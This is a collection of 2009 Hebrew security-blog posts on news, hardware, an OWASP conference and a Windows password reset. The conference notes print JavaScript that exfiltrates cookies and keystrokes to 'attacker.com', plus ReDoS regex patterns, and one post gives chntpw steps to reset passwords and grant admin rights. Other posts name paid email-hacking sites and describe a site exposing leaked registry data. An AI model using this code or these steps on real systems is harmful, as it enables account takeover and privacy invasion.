‫ZuLL, יומנו של האקר.‬

‫שוטר טועה ופדופיל יוצא בזול‬

‫גיא מזרחי‬ — Thu, 29 Oct 2009 13:29:14 +0000

קראתי היום בעיתון השקמה על משהו מעצבן ומרגיז.

חיים עטר, תושב חולון בן 56 שהוגדר ע"י המשטרה כאחד מגדולי הפדופילים שפעלו אי פעם בישראל צפוי להגיע להסדר טיעון עם הפרקליטות בו הוא יודה בשלושה מעשי סדום בלבד (המשפט לקוח מהכתבה).

התוצאה תהיה שאותו פדופיל יישב 5 שנים (בלבד) בכלא.

הסיבה היא שאחד מחוקרי המשטרה "מחק בטעות" ראיות מפלילות ממחשבו האישי של עטר.

רק כדי להבין – בכתב האישום המקורי דובר על 9 מקרי מעשי סדום ומעשים מגונים בילדים ונערים.

פעילותו של עטר התבצעה באמצעות המחשב – החל משנת 2004 נהג לגלוש באתרי היכרויות להומוסקסואלים ולפנות לנערים צעירים במטרה לקיים עימם יחסי מין.

ברור שהמחשב פה אמור לאפשר לבנות תיק הדוק במיוחד בלי הרבה בעיות להרשיע.

מה שמתואר בכתבה:

"כשניסה אחד החוקרים להעתיק את הכונן הקשיח למחשבי המשטרה, מחק השוטר בטעות חומר מפליל ממחשבו של עטר".

איך יכול להיות שחוקר מוחק ראיות?

מצער.

אני זמן רב חושב על זה שכדאי להקים "משמר אזרחי" לאינטרנט.

יש לא מעט אנשים שיהיו מוכנים לעזור ולתרום ממרצם וזמנם לאיתור פדופילים ועברייני רשת אחרים.

יש יתרון משמעותי בכך שאנשים שהמחשב והאינטרנט הם תחומי ההתמחות העיקרית שלהם יוכלו לעזור. אין לי ספק שהמשטרה תקבל חיזוק רציני אם זה יקרה.

מי מתנדב?

‫כמה עולה פריצה לשירותי מייל?‬

‫גיא מזרחי‬ — Sun, 25 Oct 2009 19:05:58 +0000

כתבה שקראתי לא מזמן מספרת על מקרה של אישה בשם איליין שחשדה בחבר שלה שהוא בוגד בה.

אפשרות אחת הייתה ללכת לחוקר פרטי אבל היא בחרה להיכנס לאתר בשם yourhackerz.com.

בעלות של 100$ חברי האתר סיפקו לה את סיסמת ה-AOL של המייל של החבר.

100$ נוספים והיא קיבלה את הסיסמה של אשתו.

עוד 100$ והיא קיבלה גם סיסמה של חברה נוספת של הבחור.

איליין המשיכה את ה"טיפול" בעניין ע"י שיחות טלפון מטרידות (בעזרת שימוש בשירות SPOOFING כמובן שהסווה את קולה וגרמו לה להישמע כגבר).

הדבר משך את תשומת ליבן של חוקרי FBI והתוצאה היא משפט ו-15 חודשים בכלא.

מה שמעניין אותי הוא השירות שסיפקו אנשי האתר.

יש כמה וכמה אתרים שמספקים שירותים דומים:

Piratecrackers.com, hackmail.net ועוד לא מעט אתרים מספקים שירותים כאלה והם מציעים שירותי פריצה גם לחשבונות yahoo, gmail, facebook, hotmail ועוד.

החוקים הפדרליים בארה"ב אמנם אוסרים על פריצות למייל אבל זאת נחשבת עבירה בלבד ולא משהו שייתן טריגר לטיפול בפורץ כל עוד לא נעשתה עבירה נוספת ורצינית על החוק..

איך תדעו שלא עובדים עליכם?

התשלום מתבצע רק לאחר שהם שולחים לכם snapshot של החשבון שאליו הם פרצו – תצלום של תכתובות מייל וכ"ו.

איך הם פורצים לחשבון?

הטענה היא שהשיטה מתבססת על לינק שנשלח אל הקורבן מדביק אותו בכלי שאוסף את הסיסמה לשירות בפעם הבאה שהיא מוקלדת ושולח את הסיסמה לתוקף.

בהחלט יכול להיות שהשיטה שונה ומתבססת על פישינג או דברים אחרים.

בקיצור – 100$ לסיסמה.

שימו לב, כיוון שאני צופה מראש את מבול השאלות על העניין:

1. אין לי מושג אם השירותים האלה עובדים או לא. לא ניסיתי ואני לא צריך ולא מתכוון לנסות.

2. האקר אמיתי שיכול לפרוץ חשבונות כאלה יעשה את זה (אם בכלל) בסכום הרבה יותר גבוה – אין סיכוי שמישהו יעבור על החוק בשביל 100$.

אלפי דולרים נשמע סביר יותר (ולא, אני לא עושה דברים כאלה אם עוד לא הבנתם).

‫Metasploit נמכרה ל-Rapid7‬

‫גיא מזרחי‬ — Sun, 25 Oct 2009 14:17:46 +0000

חברת Rapid7 שמתמחה בניהול פגיעויות (Vulnerability Management) רכשה את Metasploit.

המשמעות כנראה תהיה שהמוצר NeXpose- מוצר מסחרי של Rapid7 ישופר ע"י הטמעת הפלטפורמה של Metasploit.

HD Moore יכהן כ-CISO של Rapid7 וארכיטקט ראשי של Metasploit.

ב-LinkedIn של HD יש כבר שינוי

‫מה פרסום באתר פופולארי עושה לכמות הכניסות?‬

‫גיא מזרחי‬ — Sun, 25 Oct 2009 13:33:00 +0000

למי שעוד לא ראה, העיתון כלכליסט פירסם כתבה על כך שבפורומי ההאקינג בחור חביב בשם labba יצר מדריכי וידאו לפתרון האתגרים של השב"כ.

קודם כל, אתחיל ואומר שאני מרגיש לא נוח עם זה שפורסמו פתרונות כאלה אצלי בפורומים אבל זה היה ברור שזה יקרה. אם לא פה, אז במקום אחר.

למעשה, אני שמח שפורום הריוורסינג תופש תאוצה. מקווה שזה יקדם את החבר'ה שמסתובבים בפורומים וילמד אותם.

התוצאות הישירות של הפרסום נראו מיד בכמות הכניסות לפורומים. אם ביום רגיל מבקרים בו כ-500 VISITORS (על פי גוגל אנאליטיקס), ביום הפרסום הכמות קפצה ל-1170.

‫קניתי Lenovo X200‬

‫גיא מזרחי‬ — Fri, 02 Oct 2009 12:25:39 +0000

מי שמכיר אותי יודע שאני אוהב LapTopים קלים ככל האפשר.

התוספת החדשה לקומונת המחשבים שלי היא X200 של לנובו.

מחשב מדהים ביותר.

סוללה שמספיקה לכ-5 שעות עבודה, מודם סלולרי מובנה, דיסק קשיח ענק.

הבעיה? הוא מגיע עם ויסטה ואני עדיין לא בטוח שאני רוצה לשנות את זה

הוא פשוט עובד מעולה.

נכון שויסטה זוללת משאבים והיא בערך ה-WINDOWS הכי גרוע מאז ME אבל על מחשב חזק, היא פשוט עובדת טוב והשימושיות שלה נהדרת.

מצד שני, נורא חסר לי האובונטו שלי כשאני מטייל עם המחשב הזה. בעיקר בגלל הרגל אבל גם בגלל היכולות של LINUX לעשות דברים חביבים עם Aircrack .

מדהים שרק לא מזמן הייתי צריך להתרגל לאובונטו והיום, אני צריך להתרגל מחדש ל-WINDOWS.

חבר אמר לי – אם כל כך חסר לך אובונטו – תעשה Dual Boot.

דואל בוט זה להתפשר על הכל. כל פעם RESTART כדי לעבור בין המערכות? למה?

אז למה לא לעבור לגמרי?

במחשבים כאלה זאת בעיה להפעיל הכל בנוחיות כמו שהם מגיעים ואני לא רוצה לאבד את הנוחות.

יש פה המון חומרה ייחודית ומכמה שירשורים שקראתי על הדגם שיש לי, לא הצליחו לפתור את כל הבעיות עד הסוף ולגרום למודם לעבוד במהירות המלאה, לקורא טביעות האצבע לעבוד 100% וכ"ו.

אני אעבוד ל-WINDOWS7 כשייצאו דרייברים רשמיים. עד אז, אני עם VISTA.

מה שכן, putty עדיין עובד הרבה מעל לממוצע על המחשב שלי…

לגבי ה-X200.. המחשב פשוט מעולה.

אני ממליץ עליו בכל פה ומאוהב בו קשות.

איכות הרכבה מעולה, תכנון מעולה. המחשב פשוט מדהים.

מעניין שלנובו הצליחו לשמור על רמה גבוהה כמו שהיתה בעבר, כשהיו מייצרים מחשבים ל-IBM.

‫איך להאיץ קצת את ה-iPhone שלכם?‬

‫גיא מזרחי‬ — Fri, 02 Oct 2009 01:08:17 +0000

התקנתם OS3 באייפון ועכשיו הוא לא זז? יש לזה פתרון.

אפשר לאפשר לאייפון להקצות חלק מהזכרון שלו ל-SWAP וכך בעצם להרוויח מעט יותר זכרון במכשיר. התוצאה אצלי היא שיפור מהותי במהירות.

אמנם חלק מהאנשים אמרו שזה האיט להם את המכשיר אבל אני רואה שיפור של כ-20% בביצועים וזה לא מעט בכלל. המכשיר חזר להיות מהיר

מה החסרונות? אני לא בטוח איזה זכרון FLASH יש באייפון.

אם זה הסוג הזול (MLC) הוא מוגבל לכ-10000 מחזורי קריאה/כתיבה ואם זה הסוג הטוב יותר הוא מוגבל לכ-100000. ז"א שאם אתם מבצעים את השינוי אתם תראו שיפור מהותי בפעולה על חשבון כתיבות רבות יותר לזכרון הזה.

אחרי ההזהרות וההבהרות, איך עושים?

1. מורידים את הקובץ הזה:

http://rapidshare.com/files/287420987/com.apple.dynamic_pager.plist

2. מתחברים עם winscp או כל תוכנת העברת קבצים אחרת לאייפון שלכם.

3. מעלים את הקובץ אל /System/Library/LaunchDaemons

עושים RESTART למכשיר.

התוצאה תהיה שכמה שניות לאחר ה-RESTART האייפון יהיה איטי. לאחר מכן הוא מהיר מאוד אצלי.

אם מישהו מבצע – אשמח לשמוע אם השתפר אצלכם המצב.

כל המידע מפה:

http://modmyi.com/forums/general-iphone-chat/681840-iphone-swap-space.html

‫אנטיוירוס חינם ממיקרוסופט‬

‫גיא מזרחי‬ — Wed, 30 Sep 2009 11:41:50 +0000

מיקרוסופט השיקה אתמול את האנטיוירוס שלה – MSE.

MSE הם ראשי התיבות של Microsoft Security Essentials וזהו כינויו של אנטיוירוס שהחברה משיקה בחינם לכל רוכש WINDOWS.

אם נעזוב רגע את האיכות של המוצר (לא בדקתי אותו עדיין), אני חושב שיש כאן מעשה נבון מאוד מצד מיקרוסופט.

1. היא לא מתכוונת להפיץ את MSE כמוצר PRE-INSTALLED ולכן לא מסתכנת באמירות בעייתיות מצד מתחרים בשוק.

2. המוצר יחולק בחינם לכל מי שרכש WINDOWS.

3. מיקרוסופט מעריכה ש-60% ממשתמשי WINDOWS עובדים כרגע ללא אנטיוירוס והיא נותנת להם פתרון.

אין לי ספק שמהלך כזה יחזק את Windows מבחינת אבטחה.

אני מניח שיצרני OEM כן יתקינו את האנטיוירוס הזה כברירת מחדל וכך גם טכנאי PC מזדמנים (כל עוד האנטיוירוס יוכיח עצמו).

מהלך מעולה של מיקרוסופט שנועד להחליף את One-Care – מה שהיה אמור להיות התשובה של מיקרוסופט ל-MALWARE ומזיקים אחרים.

להורדה: http://www.microsoft.com/Security_essentials

‫בלינוקס זה לא היה קורה…‬

‫גיא מזרחי‬ — Sat, 26 Sep 2009 16:43:12 +0000

זה:

גם זה:

וגם זה:

אבל באייפון – זה בהחלט קורה..

אגב- נסיון ה-VNC קורה הרבה יותר מפעם אחת.

אני מניח שלא מעט כן מסכימים לזה (בעקבות הפוסט הקודם).

‫פוסט מעולה אצל איתן כספי.‬

‫גיא מזרחי‬ — Sat, 26 Sep 2009 14:28:38 +0000

לכן לקרוא פה:

http://security.caspi.org.il/?p=1187

לא רוצה להרוס לכם.

‫Certificate חוקי או לא? למשתמשים זה לא ממש משנה..‬

‫גיא מזרחי‬ — Fri, 25 Sep 2009 13:48:08 +0000

קראתי לא מזמן כתבה מ-themarker שמתארת מחקר שהתבצע בנושא ה-SSL ו-CERTIFICATES החוקיים.

המחקר בא לבדוק עד כמה בעייתית הודעת השגיאה של Certificate לא תקין מבחינת המשתמש שגולש אל שירות שאמור להיות מאובטח.

החוקרים גילו ש- 55% עד 100% מהמשתמשים התעלמות מהתראת הבטיחות של הדפדפן.

התלות היא בניסוח בו משתמש הדפדפן כדי להעביר את המידע למשתמש ובסוג האתר אליו הם גולשים.

רבים מהגולשים חושבים שהם יכולים להתעלם מההודעה אם מדובר באתר שהם סומכים עליו אך נרתעים מעבודה מול אתר עם Certificate שבור כאשר האתר פחות מהימן.

הבעיה פה היא שדווקא באתרים שהגולשים מכירים וסומכים עליהם, אין משמעות אמיתית לעובדה שהחתימה אינה תקינה.

דוגמה טובה לאתרים כאלה הם אתרי בנקים – המשתמשים סומכים עליהם ולכן אין משמעות שה-Certificate אינו תקין.

המשמעות היא שגולשים חשופים יותר דווקא באתרים כאלה להתקפות Man in the middle, בדיוק אותם אתרים שבהם נוהגים לייצר מנגנון הצפנה כזה שחלק מתפקידו להתמודד עם איום שכזה.

ב-FireFox 3 והאלה הדפדפן מקשה על המשתמש להתעלם מההזהרות ואכן במחקר עלה שדווקא המשתמשים בדפדפן זה התעלמו פחות מהודעות האזהרה הרלוונטיות.

התראות אלטרנטיביות שנוסו על דפדפנים הצליחו להשיג יעילות גבוהה יותר מול המשתמשים.

מסקנות:

החוקרים אומרים שהמערכת אמורה פשוט למנוע גישה ולא רק לייצר התראה כיוון שהתראות עובדות רק עד גבול מסויים. המערכת צריכה להחליט אם מדובר בהתקפה ואם כן- פשוט לחסום את המשתמש מלהיכנס לאתר בעייתי.

תוספות שלי:

מניסיון העבר אני יכול להעיד שרובם הגדול של המשתמשים אינם מבינים את הודעות השגיאה. מדובר באי הבנה על בסיס יכולת טכנולוגית או בשל אי הבנת השפה בה מוצגת ההתראה באופן מספק.

ראיתי לא פעם אנשים לוחצים על Accept רק כי לא ידעו מה ההתראה הרלוונטית אומרת ומה הסכנה שאליה הם נחשפו.

ב-WINDOWS VISTA מיקרוסופט ניסתה להכניס מנגנון התראות, UAC, שאמור להזהיר את המשתמש מביצוע פעולה בעייתית או מסוכנת.

הבעיה ביישום הייתה שהרבה מאוד פעולות הקפיצו את חלון ההתראה והתוצאה הייתה דרישה מצד המשתמשים להסיר את העניין. זו טעות נפוצה של אנשי אבטחה שגורמים ל-USABILITY להיות הרבה פחות טוב כדי לייצר מנגנון מאובטח יותר. התוצאה היא בד"כ נטרול/החלפה של רכיב האבטחה.

ב-WINDOWS 7 נראה שהמנגנון הרבה יותר סלחני ורלוונטי ולכן כנראה שיהיה יותר יעיל.

הפרדוקס הוא יעילות מבחינת אבטחה מול שימושיות.

פעם אחר פעם מוכח שתפיסת האבטחה חייבת לאפשר למשתמש לעבוד בלי הרבה פגיעה בשימושיות. במידה והדרישה הזו לא מתקבלת התוצאה לעיתים רבות תהיה שהמוצר יכשל בתפקידו וייזנח.

‫מה היה בכנס OWASP2009?‬

‫גיא מזרחי‬ — Fri, 11 Sep 2009 12:29:47 +0000

כנס OWASP 2009:

הרצאה ראשונה: מדברת על זיהוי הקלדות בצורה מסויימת – לא שמעתי אותה ולכן לא אגיב או ארחיב עליה.

עדי שהרבני, Utilizing XSS vulnerabilities:

בעקבות עבודה מול לקוח ומציאת XSS במערכות שלו וטענה של הלקוח שלא ניתן לנצל את אותו XSS.

עפ"י DESIGN – לא ניתן לייצר בעיית אבטחה ע"י JS בשל מנגנון SOP. סקריפט מאתר X יכול לתקשר ולייצר אינטראקציה מלאה רק עם אתר X.

XSS שובר את SOP.

ניתן לייצר מנגנון אבטחה ע"י SESSION COOKIE = YOUR IDENTIFICATON. הדבר בעייתי כש-XSS שולח את העוגיה לתוקף..

דוגמה:

עדי מייצר פונקציה:

Function senddata(data) {

Img=document.createElement("img");

Img.src='http://attacker.com/data='+data;

Document.body.appendChild)img);

}

אם ה-COOKIE הוא HTTP ONLY? אפשר להריץ KEYLOGGER על המחשב של המותקף..שמים IFRAME למותקף שדרכו הוא יגלוש וכך ה-KL שלנו ימשיך לרוץ במעבר אל עמודים אחרים.

Function hijackKeyStrokes() {

Frame.document.onkeypress = function() {

sendData(string.fromcharcode(frame.event.keycode));

}

}

שאלה: מה קורה אם יש למשתמש TOKEN?
מכינים לו עמוד שירוץ רק ב-ON SUBMIT. כשהמתקף יבצע SUBMIT וייאלץ בכל אופן להקליד את הקוד שלו – הקוד שלנו ירוץ..

שאלה: מה קורה אם האתר שלי רץ על HTTPS?
עדי עונה שאין הבדל רק שחשוב שאם יש הפנייה לסקריפט חיצוני שגם הוא יהיה על HTTPS.

אבי דוגלן, identity management.

אבי מסביר מראש שזאת הרצאה מאוד לא טכנית ודי מסובכת. The missing link.
מה זאת מערכת IDM?
מערכת תשתיתית וארגונית לניהול היישויות והמשתמשים בארגון.
זמן הטמעה בארגון של 50K עובדים (ארגון בינוני/גדול) הוא כ-6 חודשים לטענת VENDORS אך אורכת בין שנתיים לשלוש שנים.
עלות כ-100K$ לטענת VENDORS, עלות אמיתי של כ-2-3M$.
ההרצאה עצמה לא אמרה הרבה, היה מאוד משעמם ולהערכתי הרבה מאוד אנשים יצאו החוצה.
מה הקשר של זה ל-OWASP? לא מובן.

Regular Expression Denial of Service: Adam Weidman.

ReDoS – התקפה שיכולה לרוץ על השרת או הלקוח.
DoS – התקפה על Avalability.
ההתקפה הקלאסית: שליחת הרבה פקטות ובעקבות כך גרימת עומס והקרסת האפליקציה.
התקפות חכמות:
- במקרה של BOF באפליקציה יש אפשרות להקריס עם פקטות מעטות ואפילו אחת בלבד.
- Fragmentation of data structure
התקפה נוספות: בעזרת REGEX = REDOS ידוע משנת 2003.
החידוש הוא שימוש ב-REGEX כדי לתקוף אפליקציה WEBית.
מה זה REGEX מסוכן? כזה שיש לו בעיה ועלול להיתקל בקלטים מסויימים:


(a+)+
([a-zA-Z]+)*
(a|aa)+
(a|a?)+

אם נזין להן קלט כגון: Aaaaaaaaaaaaaaaax זה יכול לייצר בעיה..
איפה יש אפשרות לנצל?
IIS משתמש ב-REGEX כדי לעשות ולידציות לקלטים ולכן חשופים להתקפה הזו.
גם DB מסויימים מאפשרים לעבוד עם REGEX ולכן גם הם חשופים להתקפה.
מערכות IDS ו-IPS גם הן מנוהלות ומבוססות REGEX וגם WAFים ולכן חלק מאלה חשופים גם כן.
איך תוקפים SERVER SIDE?
התקפה עיוורת כשלתוקף אין מידע.
בד"כ יש צורך בהתקפה שאינה עיוורת כיוון שהולידציה מתבצעת גם ב-SS וגם ב-CS, ז"א שכל מה שצריך זה לפתוח את הסורס של ה-HTML ויהיה שם סקריפט ולידציה.
Google code search מאפשר לחפש REGEXים בעייתיים באפליקציות קוד פתוח

רעיון חביב:
אדם לקח את ההצעה של וידוא כתובת מייל נכונה מפרוייקט עזוב ב-OWASP והראה איך אפשר לייצר עליו DOS.
זה היה חביב ועופר שיזף היה חייב לעלות לבמה ולהסביר שמדובר בפרוייקט עזוב ולכן לא מתוחזק. עפר הציע שמישהו ייקח זאת על עצמו.

SSSL – Server Side Secure Login:

הגנה מהתקפות פישינג.
פישינג בד"כ מתחיל במייל עם לינק, כשהמותקף מקבל ולוחץ הוא מגיע לאתר שגונב את הפרטים שלו.
ההתמקדות בפרוייקט היא בצד הלקוח ה-SSLי כשהמשתמש מבין שהוא לא באתר האמיתי.
מתי יש בעיה? כשעל האתר המתקיף יש סרטיפיקט מתאים לאתר הפישינג או כשאין בכלל מנעול והאתר אינו SSLי.
גם באתרים עם אזהרה על סרטיפיקט שאינו ולידי רובם הגדול של המשתמשים עדיין לוחצים על הלינק ועובדים מול האתר.
פתרון מוצע: login bookmark.
האתר מייצר לינק ייחודי לכל משתמש שבתהליך הרישום יוכנס ל-BOOKMARK של הדפדפן.
רק לאחר זיהוי של הסיסמה והכניסה דרך ה-BOOKMARK הוא יוכל להיכנס.
בניסוי באוניברסיטת בר-אילן מול אתר שמשתמשים בו כ-500 סטודנטים, ניסו לבדוק מה אחוז הזיהוי של מתקפות:
קבוצת הבקרה – נסמוך על הדפדפן – כ-20%
שם אתר + לא אינטראקטיבי – כ-40%.
מזהים אינטראקטיביים – כ-80%.
השיטה שלהם:
משלבת LOGIN BOOKMARK + INTERACTIVE LOGIN, פתרון קל להטמעה.
הרעיון – למשתמש יש אפשרות להיכנס רק דרך ה-BOOKMARK ואז הוא חייב לבחור את התמונה שהוא יודע עליה.
רעיון נחמד.
לדעתי הקונספט של שימוש ב-BOOKMARK מאוד מסורבל. לא רואה את עצמי משתמש בדבר כזה..

על הכנס.
הארגון היה טוב, כמו תמיד.
כל הכבוד למרכז הבין תחומי שמקצה מקום לעניין.
לדעתי ההרצאה של דוגלן לא היתה צריכה להיות בכנס הזה – אין בה שום קשר ל-web apps.
ההרצאות האחרות?
מאוד נהנתי מההרצאה על ה-DoS עם REGEX. הרעיון חביב.
ההרצאה של עדי שהרבני היתה חביבה אם כי לי היא לא חידשה כלום. עדיין – עדי הוא תותח וכיף לשמוע אותו מרצה.
פגשתי את רוני בכר, נחום הספאמר, ארז מטולה, שרון (לא מזכיר את השם המלא שלך ) ועוד מגוון אנשים מעניינים.
היה נחמד מאוד כי ההרצאה של דוגלן נתנה לנו הרבה זמן לדבר

‫שינוי סביבת העבודה שלי והעברת מכונת WINDOWS אל VMWARE‬

‫גיא מזרחי‬ — Sat, 15 Aug 2009 13:23:23 +0000

יש לי כמה וכמה מחשבים בבית.

על רובם היה בעבר XP, מחשב אחד היה עם VISTA64 והיום הוא עם WINDOWS7 ומחשב העבודה העיקרי שלי היום הוא עם ubuntu וכך גם המחשבים הניידים שלי.

אני חייב לציין שהגרסה האחרונה של אובונטו פשוט מעולה וממלאת את כל צרכי ואפילו הצלחתי להתקין עליה את המודם הסלולארי שלי (לאחר מאמץ אמנם).

בקיצור – המטרה הסופית היא להעביר את כל המחשבים ללינוקס.

הבעיה:

1. אתר הבנק לא תומך כראוי ב-FF.

2. APPLE הנבלות שמכריחים אותי להשתמש ב-ITUNES.

3. אשתי מעדיפה את ה-WINDOWS שלה.

הפתרון:

1. מחשב אחד נשאר עם WINDOWS7. הוא ישמש את אשתי לצרכים שלה ואותי ל-ITUNES.

2. כל המחשבים האחרים הופכים ללינוקסים, הפצות שונות.

3. רכישת מערך NAS (התמודדות עם הדיסקים הקשיחים שלא ממש אוהבים לעבוד).

4. שרת VM. כרגע הוא על האובונטו שלי אך בעתיד הקרוב יהפוך ל-ESX. השרת יכיל את כל אותם מחשבי XP ואחרים שאני עדיין זקוק להם למחקרים כאלה או אחרים.

VMware Server היום מחולק בחינם. הוא מוצר לא רע בכלל, אבל יש לו כמה בעיות ולכן בסוף אני מתכנן שרת ESX חביב.

ב-HOW TO FORGE יש מאמר שמסביר איך להתקין VMware על אובונטו (http://www.howtoforge.com/how-to-install-vmware-server-2-on-ubuntu-9.04).

אבל איך ממירים את המכונות הקיימות למכונות וירטואליות על השרת?

מסתבר שיש Converter מעולה של VMware. (אפשר להוריד מפה: http://www.vmware.com/products/converter)

פשוט מתקינים וניתן להמיר איתו כל מכונה כמעט! משהו יפה שיש בו זה שהוא יודע להשתמש ב-SYSPREP של WINDOWS כדי להתגבר על השינוי בחומרה ולכן המערכת עובדת באופן מושלם ב-VM.

לא לשכוח לכבות את האנטיוירוס שלכם – הוא בעייתי לסוג העבודה הזה.

אז מה השגתי?

1. התייעלות – פחות מחשבים עובדים 24/7.

2. סביבת מעבדה מעולה (שרק דורשת הרבה זכרון). ניתן לבצע REVERT למכונות, לשכפל מכונה בקלות וכ"ו.

3. נוחות לכל מי שצריך מחשב בבית.

4. את הפוסט הזה

‫שחזור חומר בבית – עד כמה זה אפשרי?‬

‫גיא מזרחי‬ — Mon, 03 Aug 2009 21:47:02 +0000

בחצי שנה האחרונה קרסו לי בנפרד, שני דיסקים של 1TB. (שניהם של סיגייט – אחד סידרה שנודעה מראש כדפוקה והשני סידרה שבה הם "התגברו על כל התקלות").

החומר מגובה רק בחלקו. מה לא? דברים פחות חשובים. מסתבר שגם הם כואבים כשלא מגבים אותם.

הדיסק עצמו החל לתקתק וכמובן – לא היה נגיש יותר.

לאחר יום של מנוחה ללא שהיה מחובר למחשב הדיסק תיקתק הרבה פחות, מה שגרם לי לחשוד שמדובר בהתחממות שגורמת לו לתקתק.

הדיסק פורק מהמחשב, נארז היטב בניילון אטום והוטבע כמעט כולו במים (מה שביצבץ היה החלק של החיבורים החשמליים, אותו לא הכנסתי).

המים- מים קרים עם קרח מפוזר. שיהיה לו נוח.

התוצאה – הדיסק לא מתקתק.

מה שנשאר לעשות זה להוציא את כל החומר מהר ככל האפשר וזה מה שעשיתי.

מקווה שלא תיזדקקו לטיפ כזה, אבל זה עובד כל עוד לא מרטיבים את הדיסק.

נ.ב. מזל טוב לי – באותו יום גם הלך לי ספק כוח ומיגרנה שהתחילה עוד אתמול. אחלה. והשבוע רק התחיל..

‫בלי קשר למחשבים‬

‫גיא מזרחי‬ — Tue, 28 Jul 2009 00:33:22 +0000

רק למוסיקה.

אור כשדים מתאחדת

בשבילי זה מאורע. בפעם האחרונה ראיתי אותם לפני המון שנים, מאז אני מתגעגע.

אפשר לקרוא על זה פה:

http://www.mako.co.il/music-Magazine/articles/Article-af6fa85923bb221004.htm

אפשר ומומלץ לבוא, ויש קבוצה בפייסבוק פה:

http://www.facebook.com/event.php?eid=119821653581

אני אהיה שם

‫מה לעשות אם שכחת סיסמה ב-WINDOWS?‬

‫גיא מזרחי‬ — Fri, 17 Jul 2009 05:45:40 +0000

היום הייתי צריך לשחזר במהירות סיסמת משתמש במחשב עם Windows Vista 64 bit שהייתי לידו.

אז איך עושים?

1. CD של backtrack או כל הפצת linux שתרצו.

2. הורידו את התוכנה chntpw. ב-backtrack זה קיים.

3. בצעו mount לכונן ה-windows שלכם מתוך הלינוקס.

(mount /dev/sda1 /mnt/sda1 בד"כ יעשה את העבודה).

4. הפעילו את chntpw כך:

chntpw -i /mnt/sda1/Windows/System32/config/SAM

בתוך התוכנה לחצו על 1 – כדי לאפס סיסמאות וכ"ו.

בחרו את המשתמש שלכם ואפסו לו סיסמה. אתם יכולים גם לתת לו הרשאות admin אם אתם ממש צריכים.

כדאי אח"כ ללכת ולבצע enable ליוזר שלכם (4 בתפריט) שכנראה כבר ננעל בנסיונות הגישה שלכם.

ביציאה יש שאלה של שמירה או לא – התשובה היא כן כמובן

קלי קלות, עובד גם על ויסטה 64 ביט.

עריכה: (כמה הערות בתגובות ששווה להזכיר):

1. זה כמובן לא נותן פתרון לקבצים שמוצפנים עם EFS. עליהם תצטרכו לעבוד בנפרד. (לא מכיר את העניין לכן לא ממליץ למי שמשתמש בזה להשתמש בפתרון הנ"ל. מצד שני, אני לא מכיר אף אחד שמשתמש בזה).

2.TheLeader מציע את OPHCRACK LINUX וגם את KONBOOT. שתי הצעות טובות.

3. ניב שואל מה הבעיה עם ERD, Active Boot וכ"ו. אין בעיה, פשוט צריך לרכוש אותן או לדאוג להן מראש.

4. gif מציע להשתמש ב-http://www.hirensbootcd.net. פתרון נהדר אם יש לכם את זה מוכן מראש.

5. ירון מאור נותן הסבר על ERD. שווה לקרוא (תגובה 13):

אני אישית מעדיף את סדרת התוכנות ERD.
שימו לב שינן שתי גירסאות של ERD למיקרוסופט:
גירסת 2007 ל- XP/2003
גירסת 2008 ל- ויסטה/2008

חפשו את זה בתוך חבילת השירות בשם Microsoft Diagnostics and Recovery Toolset

זה היה של Winternals ונקנה ע"י מיקרוסופט. זה עשה רק טוב כי גירסת 2005 יצאה מחדש כגירסת 2007 (MsDart 5.0) והמנוע מבוסס על WinPE במקום החלופי-תואם שהיה קודם. היתרון הוא היכולת לצרף תוכנות נוספות ולהריצן מתוך ה- Shell בלי בעיות תאימות וכן שפקודות ה- CMD הן מקוריות ולא "ליד" כמו שהיה ב-2005. גירסת הויסטה נקראת MsDart 6.
מיקרוסופט נותנת את המוצר חינם ללקוחות Enterprise בעלי רישיונות Volume License. זה מגיע בתוך חבילת שירות בשם Microsoft Desktop Optimization Pack או בקיצור MDOP.
http://www.microsoft.com/windows/enterprise/products/mdop.aspx
ושם זה נמצא כאחד המרכיבים של החבילה.
חיפוש קל מעלה את הטורנט הבא:
http://thepiratebay.org/torrent/4229627/Microsoft_Diagnostics_and_Recovery_Toolset_versions_5___6-DVT
לא הורדתי מכאן אבל זה יתן לכם את השמות של מה לחפש… שכחתי לציין אבל גירסה 6 של ויסטה כוללת מלבד כלי ה- ERD הרגילים גם את סביבת התיקון WinRE של ויסטה לתיקון בעיות האתחול, שחזור מגיבוי וכו'.

תודה לירון ולכל יתר המגיבים ונותני העצות, נחמד לראות שיטות אחרות

‫איך דה מרקר תומכים בחוק הביומטרי?‬

‫גיא מזרחי‬ — Wed, 15 Jul 2009 23:14:10 +0000

אם לא קראתם עדיין בדה-מרקר, איזשהו האקר ישראלי הקים אתר החושף את פרטיכם האישיים.

האתר המעניין ישב בכתובת http://infoplus.hacking.org.il (אל תנסו, הוא כבר לא למעלה).

כיוון שאור הירשאוגה ובר בן ארי לא עשו את עבודתם העיתונאית בצורה מקצועית (לא פנו אלי כדי לברר עובדות), אני חייב להגיב פה ולא שם.

1. שני חברים שלי (השם שמור במערכת, אם הם ירצו הם יגיבו) ואני הרגשנו שיש בעיה עם החוק הביומטרי.

כאדם שמכיר לא רע את תחום אבטחת המידע אני סמוך ובטוח שיש אפשרות סבירה מאוד שהמאגר כולו ידלוף החוצה (קרה מספר פעמים בעבר עם מאגרים אחרים) וגם אם לא, אני לא סומך על הפיקוח האמיתי של הנגישות אליו מצד שלטונות החוק.

לפני מספר ימים חשבנו לעורר קצת רעש עיתונאי שמסביר כמה מסוכן מאגר כזה ולצורך כך הוקם ביום שבת (עד ראשון או שני) אתר בסיסי שבעצם מורכב מבסיס הנתונים של אגרון שאותו מצאנו ככל אדם אחר באימיול.

הרעיון היה שבהנתן מספר תעודת זהות כלשהיא, ייוצר עבורו עץ משפחה מפורט כולל נ"צ שמראים על המפה איפה ממוקמת משפחתו.

2. האתר אוחסן ב-subdomain שלי ולא פורסם.

הכוונה היתה לפנות אל כמה גורמים עיתונאים (בינהם גם אחד מהעיתונאים המוזכרים למעלה) ולהראות להם כמה מסוכן מאגר מידע כזה.

3. חבר שלי פנה אל אתר no2bio, (לא מגיע להם קישור) וסיפר להם על היוזמה. בתמורה לכך הטיפשים חשפו את האתר שעוד לא היה נעול כהלכה. עוד לא היה מוגן בסיסמה וכ"ו.

מאז התגלגל סוג של כדור שלג שאני לא ממש יכול לעצור אותו.

מאכזב מאוד לראות שאותם כתבים לא לקחו את הכתבה למקום הנכון אלא בחרו לעסוק בדברים אחרים. זכותם.

אור הירשאוגה - אני יודע שאתה קורא של הבלוג הזה. איפה היושר המקצועי שלך? לא שווה לתפוס אותי כדי להבין מה עומד מאחורי זה? אתה הרי יודע של מי הדומיין.

